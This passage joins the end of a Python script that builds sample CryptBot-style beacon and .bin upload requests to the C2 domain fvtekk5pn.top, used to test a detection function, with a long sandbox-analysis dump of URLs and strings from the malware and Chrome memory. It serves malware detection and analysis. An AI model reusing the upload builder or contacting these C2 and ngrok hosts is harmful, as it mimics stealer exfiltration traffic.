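            b"Content-Type: application/octet-stream\r\n\r\n" + payload + b"\r\n"
            b"--" + b + b"--\r\n")
    head = ("POST %s HTTP/1.1\r\nHost: %s\r\nAccept: */*\r\nContent-Length: %d\r\n"
            "Content-Type: multipart/form-data; boundary=%s\r\n\r\n"
            % (UPLOAD_PATH, host, len(body), boundary))
    return head.encode("latin-1") + body


# Constructed samples: header layout from the report, payload bytes are filler.
BEACON = (b"GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1\r\n"
          b"Host: home.fvtekk5pn.top\r\nAccept: */*\r\n\r\n")
UPLOAD = build_upload("fvtekk5pn.top", "------------------------pYYjhWy1oYCwrN4mefAuzt",
                      "Viseyeg.bin", bytes(range(0xde, 0xff)))
BENIGN = (b"GET /index.html HTTP/1.1\r\nHost: example.com\r\n"
          b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("beacon", BEACON), ("upload", UPLOAD), ("benign", BENIGN)):
        print(name, "->", cryptbot_indicators(req) or "clean")
```

The absence of a User-Agent is the cheapest trait to hunt for in proxy logs, but on its own it also matches plenty of curl and monitoring traffic; the combination with a single opaque .bin upload or the fixed-shape beacon path is what narrows it to this family.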
Source: Joe Sandbox View IP Address: 239.255.255.250
Source: Joe Sandbox View IP Address: 34.116.198.130
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (10 identical entries)
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2404071818.00002854000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000003.2383596431.000028540040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383051026.0000285400EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383098644.0000285400E64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/< equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2408941027.0000285400C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcap equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2408772307.0000285400BBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000003.00000002.2409003679.0000285400C64000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: home.fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: fvtekk5pn.top
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.css
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://.jpg
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000003.00000002.2404100505.000028540010C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 00000003.00000002.2403342510.0000285400082000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW17
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://html4/loose.dtd
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs(T
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/b
Source: Amcache.hve.12.dr String found in binary or memory: http://upx.sf.net
Source: chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000003.00000002.2403742755.00002854000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000003.00000002.2403742755.00002854000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet(T
Source: chrome.exe, 00000003.00000002.2404951820.00002854003B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo?source=ChromiumBrowser
Source: chrome.exe, 00000003.00000002.2405839976.000028540069C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2380718468.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405005873.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2383596431.0000285400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381745231.0000285400454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardn
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout2
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout?source=ChromiumBrowser&continue=https://accounts.google.com/chrom
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000003.00000002.2408363061.0000285400AD0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin?source=ChromiumBrowser&issueuberauth=1
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000003.00000002.2403742755.00002854000C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revokeT(
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin(
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 00000003.00000002.2405306663.000028540052C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000003.00000002.2405839976.000028540069C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000003.00000003.2381440086.0000285400CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000003.00000002.2408941027.0000285400C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407896501.00002854009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408203681.0000285400A90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381417664.0000285400C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2382029111.0000285400C9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409105091.0000285400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2382380367.0000285400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409064457.0000285400CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381635634.0000285400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2407498885.00002854008CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2382000328.0000285400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2381440086.0000285400CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreT(
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000003.00000002.2401744967.000005FC00920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000003.00000003.2373252915.000005FC00728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2373042871.000005FC0071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2402049732.000005FC00974000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000003.00000002.2404454205.000028540020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000003.00000002.2402983966.000028540000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/g2
Source: chrome.exe, 00000003.00000003.2369613954.00005DEC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2369596532.00005DEC002D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000003.00000002.2404071818.00002854000FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406648522.0000285400768000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2403213269.0000285400050000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408875923.0000285400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405808387.000028540068C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.0000285400712000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000003.00000002.2408479158.0000285400B14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b(T
Source: chrome.exe, 00000003.00000002.2407785052.0000285400994000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000003.00000002.2406733831.0000285400788000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000003.00000002.2404403450.00002854001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000003.00000002.2405175677.00002854004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2405774284.0000285400658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: file.exe, 00000000.00000003.2048407460.0000000007902000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.goog
Source: chrome.exe, 00000003.00000002.2404769387.0000285400320000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.googl0
Source: chrome.exe, 00000003.00000003.2376918294.00002854004BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404198718.0000285400158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/:
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404198718.0000285400158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/J
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409404602.0000285400D78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2404198718.0000285400158000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.2405230971.00002854004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406818253.00002854007E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406917838.000028540080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000003.00000002.2409557607.0000285400DE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/:
Source: chrome.exe, 00000003.00000002.2408449007.0000285400AF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2406160796.000028540070C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2409707835.0000285400E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2408963284.0000285400C44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.2408449007.0000285400AF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webappT(
